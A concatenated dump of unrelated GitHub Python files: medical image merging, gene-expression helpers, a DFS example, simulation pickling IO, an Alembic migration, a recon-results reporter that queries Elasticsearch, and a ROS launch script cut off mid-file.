binary_img = np.where(full_img > 0.0, 1.0, 0.0)\n split_file_name = i.split('.nii')\n new_file_name = (split_file_name[0] + \"_merged\" + \".nii.gz\")\n new_out_dir = path.join(MERGED_DIR, new_file_name)\n new_img_nii = nib.Nifti1Image(binary_img, MRA_u_hess.affine) # produces new nifti file from array\n nib.save(new_img_nii, new_out_dir) # saves the nifti file in folder\n print(f'Done merging of: {i} and 
{j}')\n\n\n\n","repo_name":"georgiakenyon/Segmentation-method-for-cerebral-blood-vessels-from-MRA-using-hysteresis","sub_path":"MRA_Segmentation_Github/merge_hess_thresh.py","file_name":"merge_hess_thresh.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"72466677556","text":"\"\"\"\nCreated on Thu Jun 4 16:38:47 2020\n\n@author: antoinecollin\n\"\"\"\n\nfrom typing import Literal\n\nimport anndata\nimport numpy as np\nimport pandas as pd\n\ntry:\n import compute # Prevents circular import\nexcept ImportError:\n from . import compute\n\n\ndef mean_celltype(\n adata: anndata, partition_key: str = \"CellType\", add_adata: bool = True\n):\n \"\"\"\n Computes the average gene expression by celltypes\n\n Parameters\n ----------\n adata\n Annotated data matrix.\n\n partition_key\n The key in adata.obs corresponding to the annotations to be used.\n\n gene_id_key\n The key in adata.obs corresponding to the gene ID column. Default\n will use adata.var.index.\n\n add_adata\n Indicate if the average matrix should be added to the varm field\n and its index to the uns field of adata.\n\n Returns\n -------\n average_by_celltype\n The mean expression by celltype matrix with format celltypes x genes.\n \"\"\"\n celltypes = adata.obs[partition_key].cat.categories\n average_by_celltype = pd.DataFrame([], columns=list(adata.var.index))\n i = 0\n idx = []\n for cell in celltypes:\n if sum(adata.obs[partition_key] == cell) != 0:\n reduced_adata = adata[adata.obs[partition_key] == cell, :]\n mean_expr = np.asarray(reduced_adata.X.mean(axis=0))\n mean_expr = mean_expr.flatten()\n average_by_celltype.loc[i] = mean_expr\n idx.append(cell)\n i += 1\n average_by_celltype.index = idx\n if add_adata:\n adata.varm[f\"ave_celltype_counts_{partition_key}\"] = np.array(\n average_by_celltype.transpose()\n )\n adata.uns[\n f\"ave_celltype_index_{partition_key}\"\n ] = average_by_celltype.index\n return average_by_celltype\n\n\ndef get_average_celltype_counts(adata, partition_key: str = \"CellType\"):\n \"\"\"\n Gets the mean expression by celltype matrix of adata. If it's already\n in the adata object, fetches it. If it's not, computes it and adds it\n to the adata object in varm with labels in uns\n\n Parameters\n ----------\n adata\n Annotated data matrix.\n\n partition_key\n The key in adata.obs corresponding to the annotations to be used.\n\n gene_id_key\n The key in adata.obs corresponding to the gene ID column. 
Default\n will use adata.var.index.\n\n Returns\n -------\n average_by_celltype\n The mean expression by celltype matrix.\n \"\"\"\n try:\n adata.varm[f\"ave_celltype_counts_{partition_key}\"]\n except KeyError:\n average_by_celltype = mean_celltype(\n adata, partition_key=partition_key, add_adata=True\n )\n else:\n average_by_celltype = pd.DataFrame(\n adata.varm[f\"ave_celltype_counts_{partition_key}\"].transpose(),\n columns=adata.var.index,\n )\n average_by_celltype.index = adata.uns[\n f\"ave_celltype_index_{partition_key}\"\n ]\n return average_by_celltype\n\n\ndef get_anndata(adata_filename: str):\n \"\"\"\n Fetches the anndata file\n\n Parameters\n ----------\n adata_filename\n\n Returns\n -------\n The Anndata object\n\n \"\"\"\n adata = anndata.read_h5ad(\"\")\n return adata\n\n\ndef get_markers(markers_filename: str):\n \"\"\"\n Fetches the markers file\n\n Parameters\n markers_filename\n\n\n ----------\n markers_filename\n\n Returns\n -------\n A dict containing the markers list with their corresponding celltype\n\n \"\"\"\n # markers = dict(csv.read(...))\n # return markers\n\n\ndef get_spe(\n adata, spe_metric: Literal[\"shannon\", \"tau\", \"gini\"], partition_key\n):\n specs = {\n \"shannon\": compute.shannon_average,\n \"tau\": compute.tau_average,\n \"gini\": compute.gini_average,\n }\n try:\n adata.var[f\"{spe_metric}_{partition_key}\"]\n except KeyError:\n spe_func = specs[spe_metric]\n spe_list = spe_func(adata, partition_key)\n adata.var[f\"{spe_metric}_{partition_key}\"] = spe_list\n else:\n spe_list = adata.var[f\"{spe_metric}_{partition_key}\"]\n return spe_list\n","repo_name":"becavin-lab/checkatlas","sub_path":"checkatlas/metrics/specificity/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"4"} +{"seq_id":"3988813611","text":"from collections import defaultdict\nclass Graph:\n\n def __init__(self):\n self.graph = defaultdict(list)\n\n def addEdge(self, u, v):\n self.graph[u].append(v)\n # self.graph[v].append(u)\n\n return self.graph\n\ndef dfsutil(graph,v,visited):\n\n print(v,end=\" \")\n\n for neighbor in graph[v]:\n if neighbor not in visited:\n visited.add(neighbor)\n dfsutil(graph,neighbor,visited)\n\ndef dfs(graph):\n visited = set()\n\n for i in range(1,len(graph)+1):\n if i not in visited:\n visited.add(i)\n dfsutil(graph,i,visited)\n\ng = Graph()\ng.addEdge(1, 2)\ng.addEdge(2, 4)\ng.addEdge(2, 7)\ng.addEdge(4, 6)\ng.addEdge(6, 7)\ngraph = g.addEdge(3, 5)\ndfs(graph)","repo_name":"vikramiiitm/CP","sub_path":"graph/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"34272876587","text":"import os\nfrom pickle import Pickler, Unpickler\nfrom typing import Dict, Tuple\nimport numpy as np\n\nfrom typing.io import BinaryIO\n\nfrom opinions.graph.graphs import GraphManager\nfrom opinions.interfaces.interfaces import SimulationListener\nfrom opinions.objects.opinion import OpinionManager\nfrom opinions.objects.reference import ReferenceManager\n\n\nclass OpinionsIO (SimulationListener):\n structurePickler: Pickler = None\n structureUnpickler: Unpickler = None\n topologyPickler: Pickler = None\n topologyUnpickler: Unpickler = None\n xPickler: Pickler = None\n xUnpickler: Unpickler = None\n\n outfiles: Dict[str, BinaryIO]\n\n def __init__(self):\n pass\n\n def open_input_files(self, args: Dict) -> Dict:\n try:\n 
in_folder_arg = args['--inFolder']\n if not os.path.exists(in_folder_arg):\n raise FileNotFoundError(f'Folder not found {in_folder_arg}')\n\n run_id = str(args['--id'])\n # run_folder = os.path.join(in_folder_arg, run_id)\n # if not os.path.exists(run_folder):\n # raise FileNotFoundError(f'Folder not found {run_folder}')\n\n topology_file_path = os.path.join(in_folder_arg, 'topology-%s.log' % (run_id,))\n # Ugly solution that works only on windows\n # topology_file_path = '\\\\\\\\?\\\\'+topology_file_path\n topology_file = open(topology_file_path, 'rb')\n structure_file_path = os.path.join(in_folder_arg, 'structure-%s.log' % (run_id,))\n structure_file = open(structure_file_path, 'rb')\n x_file_path = os.path.join(in_folder_arg, 'x-%s.log' % (run_id,))\n x_file = open(x_file_path, 'rb')\n # d_file # Do you really want it?\n except FileNotFoundError as err:\n raise RuntimeError(\n # f\"Error: {err}\\n\"\n f\"If you are using windows. This may be caused by a problem related to long path names.\\n\"\n f\"To fix it on windows 10 1607 and later, The registry key \"\n f\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem LongPathsEnabled \"\n f\"(Type: REG_DWORD) must exist and be set to 1.\\n\"\n f\"Refer to https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file?#enable-long-paths-in-windows-10-version-1607-and-later for details.\"\n )\n\n ret = dict()\n ret['topologyFile'] = topology_file\n ret['structureFile'] = structure_file\n ret['xFile'] = x_file\n # ret['dFile'] = d_file # Really need it?\n\n self.structureUnpickler = Unpickler(structure_file)\n self.topologyUnpickler = Unpickler(topology_file)\n self.xUnpickler = Unpickler(x_file)\n\n return ret\n\n def open_output_files(self, args: Dict, protocol=4) -> Dict:\n out_folder_arg = args['--outFolder']\n if not os.path.exists(out_folder_arg):\n os.makedirs(out_folder_arg, exist_ok=True)\n\n run_id = args['--id']\n topology_file_path = os.path.join(out_folder_arg, 'topology-%s.log' % (run_id,))\n topology_file = open(topology_file_path, 'wb')\n structure_file_path = os.path.join(out_folder_arg, 'structure-%s.log' % (run_id,))\n structure_file = open(structure_file_path, 'wb')\n x_file_path = os.path.join(out_folder_arg, 'x-%s.log' % (run_id,))\n x_file = open(x_file_path, 'wb')\n # d_file # Do you really want it?\n\n ret = dict()\n ret['topologyFile'] = topology_file\n ret['structureFile'] = structure_file\n ret['xFile'] = x_file\n # ret['dFile'] = d_file # Really need it?\n self.outfiles = ret\n\n self.structurePickler = Pickler(structure_file, protocol=protocol)\n self.topologyPickler = Pickler(topology_file, protocol=protocol)\n self.xPickler = Pickler(x_file, protocol=protocol)\n\n return ret\n\n def simulation_starting(self, state):\n \"\"\"Save graph_manager, reference_manager, and opinion_manager\"\"\"\n self.topologyPickler.dump(state[0])\n self.structurePickler.dump(state[1])\n self.structurePickler.dump(state[2])\n\n def retrieve_structure_and_topology(self) -> Tuple[GraphManager, ReferenceManager, OpinionManager]:\n \"\"\"retrieve graph_manager, reference_manager, and opinion_manager\"\"\"\n return self.topologyUnpickler.load(), self.structureUnpickler.load(), self.structureUnpickler.load()\n\n def simulation_started(self, state):\n self.xPickler.dump(state)\n\n def retrieve_step_delta_and_x(self) -> Tuple[int, float, np.ndarray]:\n return self.xUnpickler.load()\n\n def update(self, state):\n # later add the ability to store change in topology graph\n if len(state) == 3:\n self.xPickler.dump(state)\n elif 
len(state) > 3:\n            self.xPickler.dump((state[0], state[1], state[2]))\n            self.topologyPickler.dump(state[3])\n        else:\n            raise RuntimeError('Unknown state length / structure : ' + str(state))\n\n    def simulation_ending(self, state):\n        self.xPickler.dump(state)\n\n    def simulation_ended(self, state):\n        self.outfiles['xFile'].close()\n        self.outfiles['topologyFile'].close()\n        self.outfiles['structureFile'].close()\n","repo_name":"PyOpinions/pyOpinions","sub_path":"pyOpinions-io/src/opinions/io/opinionsIO.py","file_name":"opinionsIO.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"1245963122","text":"\"\"\"add uploaded to vogue column to analysis\n\nRevision ID: 49ded71bd1a1\nRevises: 1dadcefd3bbf\nCreate Date: 2021-03-10 13:32:40.247574\n\n\"\"\"\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"49ded71bd1a1\"\ndown_revision = \"1dadcefd3bbf\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.add_column(\"analysis\", sa.Column(\"uploaded_to_vogue_at\", sa.DateTime(), nullable=True))\n\n\ndef downgrade():\n    op.drop_column(\"analysis\", \"uploaded_to_vogue_at\")\n","repo_name":"Clinical-Genomics/cg","sub_path":"alembic/versions/49ded71bd1a1_add_uploaded_to_vogue_column_to_analysis.py","file_name":"49ded71bd1a1_add_uploaded_to_vogue_column_to_analysis.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"4"} +{"seq_id":"13810011682","text":"#!/usr/bin/env python\n# coding=utf-8\n#Example attributes:\n    #cookedLevel: a number:\n    #0-3 means still raw, above 3 means half-cooked, above 5 means fully cooked, above 8 means overcooked\n    #cookedString: a string describing how well the sweet potato is cooked\n    #condiments: the sweet potato's condiment list, e.g. ketchup, mustard\n#Example methods:\n#cook(): roast the sweet potato for a while\n#addCondiments(): add condiments to the sweet potato\n#__init__(): set the default attributes\n#__str__(): make the print output look nicer\n\n\n#Define the class, including its __init__() method\n\n#Define the \"sweet potato\" class\n\nclass SweerPotato:\n    'This is the sweet potato class'\n\n\n    #Define the initializer\n\n    def __init__(self):\n        self.cookedLevel = 0\n        self.cookedString = \"raw\"\n        self.codiments = []\n\n\n    #Add the \"roast the sweet potato\" method\n    def cook(self,time):\n        'Roast the sweet potato'\n        self.cookedLevel += time\n        if self.cookedLevel > 8:\n            self.cookedString = \"burnt to a crisp\"\n        elif self.cookedLevel > 5:\n            self.cookedString = \"cooked\"\n        elif self.cookedLevel > 3:\n            self.cookedString = \"half-cooked\"\n        else:\n            self.cookedString = \"raw\"\n\n\n\n#Test\n\nmySweetPotato = SweerPotato()\nprint(mySweetPotato.cookedLevel)\nprint(mySweetPotato.cookedString)\nprint(mySweetPotato.codiments)\n\n#Test the cook method\nprint(\"Start roasting............\\\\n\")\nmySweetPotato.cook(4) #roasted for 4 minutes now\nprint(mySweetPotato.cookedLevel)\nprint(mySweetPotato.cookedString)\n","repo_name":"VictorSSH/Python","sub_path":"Code/OOP/oop_3_class.py","file_name":"oop_3_class.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"33738750256","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport requests\nimport subprocess\nimport os\nimport uuid\nimport json\nfrom dotenv import load_dotenv\n\nhomedir = str(os.getenv('HOME'))\nload_dotenv(homedir+'/recon/config.env')\n\ntarget = sys.argv[1]\nheaders = {'Accept' : 'application/json', 'Content-Type' : 'application/json'}\nauth = (str(os.getenv('USERNAME')), str(os.getenv('PASSWORD')))\nlista_ips = []\nlista_index = ['subdomain','portscan','webenum','webvuln','infravuln']\njson_parse = ''\ndic_ip = {}\nlist_vulns = []\nlist_sistemas = []\n\ndef consulta_bases(index):\n\tdata = 
{\"size\":10000}\n\turl = str(os.getenv('HOST'))+target+'-'+index+'/_search'\n\tget_doc = requests.get(url, headers=headers, auth=auth, data=json.dumps(data), verify=False)\n\tparse_scan = json.loads(get_doc.text)\n\treturn(parse_scan)\n\nif len(sys.argv) != 3:\n\tfor i in lista_index:\n\t\tind = consulta_bases(i)\n\n\t\tif ind not in list_sistemas:\n\t\t\ttry:\n\t\t\t\tfor x in ind['hits']['hits']:\n\t\t\t\t\tlist_sistemas.append(x['_source']['url.original'])\n\t\t\texcept:\n\t\t\t\tpass\n\n\tos.system('clear')\n\tprint(list_sistemas)\n\texit()\nelse:\n\tsistema = sys.argv[2]\n\ndef consulta_diretorios(sistema):\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('\\n[*] Directories\\n')\n\n\tlist_sis = []\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\tfor x in json_parse['hits']['hits']:\n\t\t\ttry:\n\t\t\t\tif(x['_source']['url.original'] == sistema):\n\t\t\t\t\tif(x['_source']['url.full'] not in list_sis):\n\t\t\t\t\t\tlist_sis.append(x['_source']['url.full'])\n\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\tfile.write(x['_source']['url.full']+'\\n')\n\t\t\texcept:\n\t\t\t\tpass\n\ndef consulta_ip(ip):\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('\\n[*] Ports\\n')\n\tdic_ip[ip] = []\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\ttry:\n\t\t\tfor x in json_parse['hits']['hits']:\n\t\t\t\tif(x['_source']['server.ip'] == ip):\n\t\t\t\t\tif(x['_source']['server.port'] not in dic_ip[ip]):\n\t\t\t\t\t\tdic_ip[ip].append(x['_source']['server.port'])\n\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\t\tfile.write(str(ip)+' '+str(x['_source']['server.port'])+'\\n')\n\t\texcept:\n\t\t\tpass\n\tconsulta_diretorios(sistema)\ndef consulta_vuln():\n\tlist_vulns = []\n\tip = ''\n\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\tfile.write('[*] Vulnerabilities\\n')\n\tfor index in lista_index:\n\t\tjson_parse = consulta_bases(index)\n\t\tfor x in json_parse['hits']['hits']:\n\t\t\ttry:\n\t\t\t\tfor x in json_parse['hits']['hits']:\n\t\t\t\t\tif(x['_source']['url.original'] == sistema):\n\t\t\t\t\t\tif(x['_source']['server.ip'] != '0.0.0.0'):\n\t\t\t\t\t\t\tip = x['_source']['server.ip']\n\t\t\t\t\t\tif(x['_source']['vulnerability.name'] not in list_vulns):\n\t\t\t\t\t\t\tlist_vulns.append(x['_source']['vulnerability.name'])\n\t\t\t\t\t\t\twith open (homedir+'/recon/data/'+target+'/result.txt','a') as file:\n\t\t\t\t\t\t\t\tfile.write(x['_source']['url.full']+' - '+x['_source']['vulnerability.name']+'\\n')\n\t\t\texcept:\n\t\t\t\tpass\n\n\tconsulta_ip(ip)\n\ndef main():\n\tos.system('rm -rf '+homedir+'/recon/data/'+target+'/result.txt')\n\tconsulta_vuln()\n\twith open(homedir+'/recon/data/'+target+'/result.txt', 'r') as file:\n\t\tos.system('clear')\n\t\tdata = file.read()\n\t\tprint(data)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"vida003/AutoRecon","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73769420276","text":"\"\"\"\nUnit tests go here\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom spc.helpers import (\n flatten_list,\n get_df_with_sample_id,\n get_num_of_PCs_to_retain,\n multiply_matrices,\n 
standardize_and_PCA,\n)\n\n\ndef test_flatten_list():\n assert flatten_list([[1, 1], [2, 2], [3, 3]]) == [1, 1, 2, 2, 3, 3]\n assert flatten_list([[], []]) == []\n assert flatten_list([[]]) == []\n\n\ndef test_get_df_with_sample_id():\n df_test_input = pd.DataFrame({\"x1\": [1, 2, 2, 3, 3, 4, 5]})\n df_expected1 = pd.DataFrame(\n {\"sample_id\": [1, 2, 3, 4, 5, 6, 7], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_expected2 = pd.DataFrame(\n {\"sample_id\": [1, 1, 2, 2, 3, 3, 4], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_expected3 = pd.DataFrame(\n {\"sample_id\": [1, 1, 1, 1, 1, 1, 1], \"x1\": [1, 2, 2, 3, 3, 4, 5]}\n )\n df_output1 = get_df_with_sample_id(df_test_input, n_sample_size=1)\n df_output2 = get_df_with_sample_id(df_test_input, n_sample_size=2)\n df_output3 = get_df_with_sample_id(df_test_input, n_sample_size=7)\n\n assert_frame_equal(df_output1, df_expected1, check_dtype=False)\n assert_frame_equal(df_output2, df_expected2, check_dtype=False)\n assert_frame_equal(df_output3, df_expected3, check_dtype=False)\n with pytest.raises(Exception):\n get_df_with_sample_id(df_test_input, n_sample_size=0)\n\n\ndef test_multiply_matrices():\n sigma = np.array(\n [\n [1, 0.7, 0.9, 0.3, 0.2, 0.3],\n [0.7, 1, 0.8, 0.1, 0.4, 0.2],\n [0.9, 0.8, 1, 0.1, 0.2, 0.1],\n [0.3, 0.1, 0.1, 1, 0.2, 0.1],\n [0.2, 0.4, 0.2, 0.2, 1, 0.1],\n [0.3, 0.2, 0.1, 0.1, 0.1, 1],\n ]\n )\n delta_output = np.sqrt(\n multiply_matrices(np.array([1] * 6), np.linalg.inv(sigma), np.array([1] * 6))\n )\n delta_expected = 1.86\n assert np.round(delta_output, 2) == delta_expected\n\n\n@pytest.mark.parametrize(\n \"variance_explain_min, expected_num_of_PCs_to_retain\",\n [[0.1, 1], [0.55, 2], [0.9, 3], [0.95, 3]],\n)\ndef test_get_num_of_PCs_to_retain(\n dataframe_for_PCAModel_phase1, variance_explain_min, expected_num_of_PCs_to_retain\n):\n _, PCA_object, _ = standardize_and_PCA(df=dataframe_for_PCAModel_phase1)\n num_of_PCs_to_retain, _ = get_num_of_PCs_to_retain(\n PCA_object=PCA_object, PC_variance_explained_min=variance_explain_min\n )\n assert num_of_PCs_to_retain == expected_num_of_PCs_to_retain\n","repo_name":"hviidhenrik/SPC","sub_path":"tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"4"} +{"seq_id":"28359882828","text":"n=int(input())\na=list(map(int,input().split()))\nb=max(a)\ni=1\nwhile True:\n c=0\n for j in a:\n if b*i%j==0:\n c+=1\n if c==len(a):\n print(b*i)\n break\n i+=1","repo_name":"Abhishekvaranasi07/codemind-python","sub_path":"LCM_of_n_numbers.py","file_name":"LCM_of_n_numbers.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"43541473494","text":"arr = [1, 2, 3]\nN = 3\n\nsel = [0] * N\n\n\ndef perm(idx, check):\n if idx == N:\n print(sel)\n return\n\n for i in range(N):\n if (check & (1 << i)) != 0:\n continue\n\n sel[idx] = arr[i]\n perm(idx + 1, check | (1 << i))\n\n\nperm(0, 0)\n","repo_name":"kimchaelin13/Algorithm","sub_path":"lesson/0901/순열_비트마스크.py","file_name":"순열_비트마스크.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"25147700030","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport mock\nimport os\nimport giit.python_environment\n\n\ndef test_python_environment(testdirectory):\n\n prompt = mock.Mock()\n virtual_environment = mock.Mock()\n log = 
mock.Mock()\n    requirements = testdirectory.write_text(\n        filename=\"requirements.txt\", data=\"sphinx\", encoding=\"utf-8\"\n    )\n\n    env = {\"PATH\": \"/oki/doki\"}\n    virtual_environment.create_environment.side_effect = lambda name: env\n\n    python_environment = giit.python_environment.PythonEnvironment(\n        prompt=prompt, virtual_environment=virtual_environment, log=log\n    )\n\n    venv = python_environment.from_requirements(\n        requirements=requirements, pip_packages=None\n    )\n\n    assert venv == env\n\n    command = \"python -m pip install -U -r {}\".format(\n        os.path.join(testdirectory.path(), \"requirements.txt\")\n    )\n    prompt.run.assert_called_once_with(command=command, env=env)\n","repo_name":"steinwurf/giit","sub_path":"test/test_python_environment.py","file_name":"test_python_environment.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} {"seq_id":"7551086400","text":"def read_data(filename: str) -> list[int]:\n    with open(filename) as file:\n        n = int(file.readline())\n        data = [0] * 10_000_000\n        for _ in range(n):\n            key, val = map(int, file.readline().strip().split())\n            data[key] = val\n    return data\n\n\ndef solution(data: list[int]) -> int:\n    data = list(map(lambda x: x // 48 + int(x % 48 != 0), data))\n    ans = 100 ** 100\n    sm = sum(data)\n    c = 0\n    for i in range(1, len(data)):\n        c += data[i] * i\n    b = data[0]\n    for i in range(1, len(data)):\n        c += 2 * b - sm\n        if data[i] != 0:\n            ans = min(ans, c)\n        b += data[i]\n    return ans\n\n\nprint(solution(read_data('27A.txt')), end=' ')\nprint(solution(read_data('27B.txt')))\n","repo_name":"vlad-marlo/algorithms","sub_path":"school/ege/vars/25021990/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} {"seq_id":"28380243287","text":"from flask import Flask\nfrom flask_restful import Api, reqparse\nfrom flask_swagger_ui import get_swaggerui_blueprint\nfrom app.routes.hello_world import HelloWorld\nfrom app.routes.random_message import RandomMessage\n\napp = Flask(__name__)\napi = Api(app)\nprefix = \"/api/v1\"\nparser = reqparse.RequestParser()\n\n### swagger specific ###\nSWAGGER_URL = '/swagger'\nAPI_URL = '/static/swagger.json'\nSWAGGERUI_BLUEPRINT = get_swaggerui_blueprint(\n    SWAGGER_URL,\n    API_URL,\n    config={\n        'app_name': \"Example REST API\"\n    }\n)\n\napp.register_blueprint(SWAGGERUI_BLUEPRINT, url_prefix=SWAGGER_URL)\n\napi.add_resource(HelloWorld, prefix + '/hello-world')\napi.add_resource(RandomMessage, prefix + '/message')\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"rodrigomkd/example-rest-api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} {"seq_id":"74005309237","text":"\"\"\" This function calculates the Omega matrix in Caliendo - Parro (2009)\n    Inputs are A = alphas, B = bethas, G = I-O matrix, Dinp = trade shares,\n    tarifap = tariffs, Fp = trade weighted tariffs \"\"\"\n\nimport numpy as np\nfrom numpy.linalg import matrix_power\n\n\ndef Expenditure(alphas, B, G, Dinp, taup, Fp, VAn, wf0, Sn, J, N):\n\n    # [J, N] = np.shape(alphas)\n    IA = np.zeros((J * N, J * N))\n    I_F = 1 - Fp\n\n    for n in range(N):\n        IA[n * J: (n + 1) * J, n * J: (n + 1) * J] = np.kron(alphas[:, n], I_F[:, n].T).reshape(J, J)  # one (J, J) block per country; was hard-coded as (40, 40)\n\n    Pit = Dinp/taup\n    Bt = 1 - B\n    BP = np.zeros(np.shape(Pit))\n\n    for j in range(J):\n        BP[j * N: (j + 
1) * N, :] = np.kron(np.ones(N).reshape(N, 1), Bt[j, :]) * Pit[j * N: (j + 1) * N, :]\n\n NBP = np.zeros(np.shape(BP.T))\n\n for j in range(N):\n for n in range(N):\n NBP[j, n * J: (n + 1) * J] = BP[np.arange(n, N, J * N), j]\n\n NNBP = np.kron(NBP, np.ones((J, 1)))\n GG = np.kron(np.ones((1, N)), G)\n GP = GG * NNBP\n\n OM = np.eye(J * N, J * N) - (GP + IA)\n Vb = alphas * np.kron(np.ones((J, 1)), (wf0 * VAn).T)\n Vb = Vb.reshape(J * N, 1, order='F').copy()\n Bb = -alphas * (Sn * np.ones((1, J))).T\n Bb = Bb.reshape(J * N, 1, order='F').copy()\n\n temp = matrix_power(OM, -1)\n DD1 = temp.dot(Vb)\n DD2 = temp.dot(Bb)\n PQ = DD1 + DD2\n PQ = PQ.reshape(J, N, order='F').copy()\n\n return PQ\n","repo_name":"BAFurtado/AberturaComercial","sub_path":"expenditure.py","file_name":"expenditure.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"9200570345","text":"import os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration\n\nfrom pysdf import SDF\nimport numpy as np\nimport random\n\nclass SelectRandomPose:\n\n def __init__(self, \n sdl_path, \n min_x,\n min_y,\n max_x,\n max_y): \n\n self.parsed_sdl = SDF.from_file(sdl_path, remove_blank_text=True)\n self.parsed_sdl.to_file(sdl_path, pretty_print=True)\n self.objects_to_ignore = [\"head\", \"left_hand\", \"right_hand\", \"left_foot\", \"right_foot\", \"body\"]\n self.cylinder_radius = 0.2\n self.min_x = min_x\n self.min_y = min_y\n self.max_x = max_x\n self.max_y = max_y\n\n def __cylinder_detect(self):\n self.cylinder_poses = []\n for visual in self.parsed_sdl.iter(\"visual\"):\n if visual.name not in self.objects_to_ignore:\n pose = np.fromstring(visual.pose.text, count=6, sep=\" \")\n self.cylinder_poses.append(pose)\n\n def get_random_pose(self):\n self.__cylinder_detect()\n while True:\n x = random.uniform(self.min_x, self.max_x)\n y = random.uniform(self.min_y, self.max_y)\n self.pose = np.array([x, y])\n self.valid_pose_x_list = []\n self.valid_pose_y_list = []\n\n for cylinder_pose in self.cylinder_poses:\n valid_pose_x = not cylinder_pose[0] - self.cylinder_radius < self.pose[0] < cylinder_pose[0] + self.cylinder_radius \n valid_pose_y = not cylinder_pose[1] - self.cylinder_radius < self.pose[1] < cylinder_pose[1] + self.cylinder_radius \n self.valid_pose_x_list.append(valid_pose_x)\n self.valid_pose_y_list.append(valid_pose_y)\n\n if False not in self.valid_pose_x_list and False not in self.valid_pose_y_list: \n return self.pose\n\n\ndef generate_launch_description():\n launch_file_dir = os.path.join(get_package_share_directory('turtlebot3_gazebo'), 'launch')\n pkg_gazebo_ros = get_package_share_directory('gazebo_ros')\n\n world = random.randint(1, 4)\n\n path_sdf_model = f\"~/../../opt/ros/humble/share/turtlebot3_gazebo/models/g2w{world}/model.sdf\"\n path_sdf_model = os.path.expanduser(path_sdf_model)\n selectRandomPose = SelectRandomPose(sdl_path = path_sdf_model, \n min_x = -1.3,\n min_y = -1.5,\n max_x = 2.0,\n max_y = 1.5)\n \n pose = selectRandomPose.get_random_pose() \n\n \n\n use_sim_time = LaunchConfiguration('use_sim_time', default='true')\n x_pose = LaunchConfiguration('x_pose', default=f'{pose[0]}')\n y_pose = LaunchConfiguration('y_pose', default=f'{pose[1]}')\n \n\n if world == 1: 
